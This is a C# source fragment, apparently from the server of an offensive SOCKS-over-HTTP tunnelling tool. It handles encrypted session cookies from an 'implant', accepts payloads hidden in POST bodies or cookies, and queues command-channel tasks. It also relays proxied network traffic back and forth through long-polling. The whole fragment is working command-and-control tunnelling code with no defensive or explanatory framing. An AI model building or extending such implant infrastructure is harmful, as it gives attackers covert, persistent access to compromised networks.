void ProcessCommandChanelImplantMessage(List <byte> message) { var xdoc = XDocument.Parse(UTF8Encoding.UTF8.GetString(message.ToArray())); var elms = xdoc.XPathSelectElements("CommandChannel/ListenerStatus"); xdoc.XPathSelectElements("CommandChannel/ListenerStatus").ToList().ForEach(x => { var nodeStatus = x.XPathSelectElement("Status"); if (nodeStatus != null) { var sessionId = nodeStatus.Attribute("SessionID").Value; var status = nodeStatus.Value; SocksProxy.NotifyConnection(sessionId, status); ServerComms.LogMessage($"Status: connection {nodeStatus.Attribute("SessionID").Value} - {nodeStatus.Value}"); } }); }
public void ProcessRequest(System.Net.HttpListenerContext ctx) { System.Net.Cookie sessionCookie = null; try { sessionCookie = ctx.Request.Cookies[_sessionIdName]; if (sessionCookie == null || String.IsNullOrEmpty(sessionCookie.Value)) { ctx.Response.StatusCode = 401; ctx.Response.Close(); return; } } catch (Exception ex) { ServerComms.LogMessage($"ERROR Processing session cookie {ex.Message}"); } String decryptedSessionId = null, decryptedStatus = null; try { var decr = _encryption.Decrypt(sessionCookie.Value); if (decr == null) { throw new Exception($"Can't decrypt session cookie{sessionCookie.Value}"); } var decryptedSessionStatus = UTF8Encoding.UTF8.GetString(decr.ToArray()).Split(':'); decryptedSessionId = decryptedSessionStatus[0]; decryptedStatus = decryptedSessionStatus[1]; if (String.IsNullOrWhiteSpace(decryptedSessionId)) { throw new Exception($"Session cookie decrypted to nothing or whitespace"); } } catch (Exception ex) { ServerComms.LogError($"Error occured communicating with implant {ex.Message}"); ctx.Response.StatusCode = 500; ctx.Response.Close(); return; } String response = null; List <byte> responseBytes = new List <byte>(); String uploadedPayload = null; //TO DO: Payload is currently coming up as different content types try { if ("POST" == ctx.Request.HttpMethod) { //Yeah casting ContentLength64 to an int is not idle, but we should not be uploading anywhere near 2gb+ in one request!!!!! uploadedPayload = (new StreamReader(ctx.Request.InputStream)).ReadToEnd(); } else if ("GET" == ctx.Request.HttpMethod) { var payloadCookie = ctx.Request.Cookies[PayloadCookieName]; //TO DO: Dodgy as hell. Need to make sure this can be tampered/malleable etc //This could be whenever in the request. Need to sort that out if (null != payloadCookie) { if (!String.IsNullOrWhiteSpace(payloadCookie.Value)) { uploadedPayload = payloadCookie.Value; } } } } catch (Exception ex) { ServerComms.LogMessage($"ERROR Processing payload data {decryptedSessionId} {ex.Message}"); } ConnectionDetails dtls = null; if (decryptedSessionId == _commandChannel) { try { var ready = false; Int32 ctr = 0, cmdTasks = 0; ProcessCommandChannelTime(); if (null == uploadedPayload || uploadedPayload.Count() == 0) { ServerComms.LogMessage($"Command channel sending {_commandTasks.Count()} tasks "); } else { mapSessionToConnectionDetails[_commandChannel].DataRecv += uploadedPayload.Count(); if (_commandTasks.Count() > 0) { ServerComms.LogMessage($"Command channel payload {uploadedPayload.Count()} bytes, sending {_commandTasks.Count()} tasks "); } ProcessCommandChanelImplantMessage(this._encryption.Decrypt(uploadedPayload)); } lock (_commandLocker) { cmdTasks = _commandTasks.Count(); } if (cmdTasks == 0) { while (!(ready = _cmdTaskWaitEvent.WaitOne(1000)) && ctr++ < 40) { ; } } lock (_commandLocker) { cmdTasks = _commandTasks.Count(); } if (cmdTasks > 0) { response = new XElement("Response", new XElement("Tasks", PopQueueCommandTasks())).ToString(); } else { response = BuildStandardResponse().ToString(); } _cmdTaskWaitEvent.Reset(); responseBytes.AddRange(UTF8Encoding.UTF8.GetBytes(response)); mapSessionToConnectionDetails[_commandChannel].DataSent += responseBytes.Count(); } catch (Exception ex) { ServerComms.LogMessage($"ERROR Processing command channel message {ex.Message}"); } } else { try { if (decryptedStatus == "closed") { ServerComms.LogMessage($"Close connection has been called on {decryptedSessionId}"); //Implant has called time //cleanup the data queue lock (_dataTasks) { if (_dataTasks.ContainsKey(decryptedSessionId)) { _dataTasks[decryptedSessionId].Tasks.Clear(); var wait = _dataTasks[decryptedSessionId].Wait; _dataTasks[decryptedSessionId].DisposeWait(); _dataTasks.Remove(decryptedSessionId); } } lock (_listenerLocker) { _listeners.Remove(decryptedSessionId); } //Let the socks know its over SocksProxy.ImplantCalledClose(decryptedSessionId); ctx.Response.StatusCode = 200; ctx.Response.OutputStream.Close(); return; } else if (SocksProxy.IsValidSession(decryptedSessionId)) { if (!SocksProxy.IsSessionOpen(decryptedSessionId)) { SocksProxy.NotifyConnection(decryptedSessionId, "open"); } dtls = SocksProxy.GetDetailsForTargetId(decryptedSessionId); if (null == uploadedPayload || uploadedPayload.Count() == 0) { if (ServerComms.IsVerboseOn()) { ServerComms.LogMessage($"Requesting data for connection {dtls.HostPort}:{dtls.Id}"); } } else { ServerComms.LogMessage($"[Rx] {dtls.HostPort}:{dtls.Id} {uploadedPayload.Count()} bytes "); SocksProxy.ReturnDataCallback(decryptedSessionId, this._encryption.Decrypt(uploadedPayload)); } } else { if (ServerComms.IsVerboseOn()) { ServerComms.LogMessage($"Session ID {decryptedSessionId} is not valid"); } ctx.Response.StatusCode = 404; ctx.Response.OutputStream.Close(); return; } var ctr = 0; var dataQueue = _dataTasks[decryptedSessionId]; var ready = false; while (null != dataQueue.Wait && !(ready = dataQueue.Wait.WaitOne(1000)) && ctr++ < _longpolltimeout) { ; } if (ready && dataQueue.Tasks.Count() > 0) { lock (dataQueue.PayloadLocker) { while (dataQueue.Tasks.Count != 0) { responseBytes.AddRange(dataQueue.Tasks.Dequeue()); } } dataQueue.Wait.Reset(); if (null != dtls) { ServerComms.LogMessage($"[Tx] {dtls.HostPort}:{dtls.Id} {responseBytes.Count()} bytes "); } } else if (null != dtls) { ServerComms.LogMessage($"[Tx] {dtls.HostPort}:{dtls.Id} nothing to send. TimedOut: {!ready}"); } } catch (Exception ex) { ServerComms.LogMessage($"ERROR Processing response for connection {decryptedSessionId} {ex.Message}"); } } try { ctx.Response.StatusCode = 200; var payload = EncryptPayload(responseBytes); if (null != payload && payload.Count > 0) { ctx.Response.OutputStream.Write(payload.ToArray(), 0, payload.Count()); } ctx.Response.OutputStream.Close(); } catch (Exception ex) { ServerComms.LogMessage($"ERROR Writing response back to client {ex.Message}"); } }